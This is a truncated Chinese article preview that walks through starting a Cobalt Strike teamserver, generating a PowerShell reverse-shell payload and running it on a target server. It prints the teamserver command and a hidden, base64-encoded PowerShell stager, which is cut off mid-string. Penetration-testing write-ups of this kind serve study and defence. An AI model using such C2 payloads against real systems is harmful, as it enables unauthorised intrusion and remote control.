文章预览
本次所使用的攻击机为kali linux系统,攻击过程中涉及到的工具主要有:proxychains,nmap等。攻击的拓扑结构如下图所示。 1 反弹Shell 首先启动CobaltStrike的服务端,并执行命令如下所示: >> > ./teamserver 192.168 . 43.137 xxxxxx 启动Cobaltstrike的客户端,并填写运行服务端的ip地址,端口号,用户名,及在服务端设置的密码口令。 进入CobaltStrike客户端控制面板以后,依次点击Attacks>Payload Generator选项,设置监听以及生成payload。 点击Add选项后,设置监听方式及监听的端口号,输出方式选择Powershell Command。 如下为生成的powershell形式的payload。 将复制的payload在目标服务器主机上执行,如下所示: powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQ
………………………………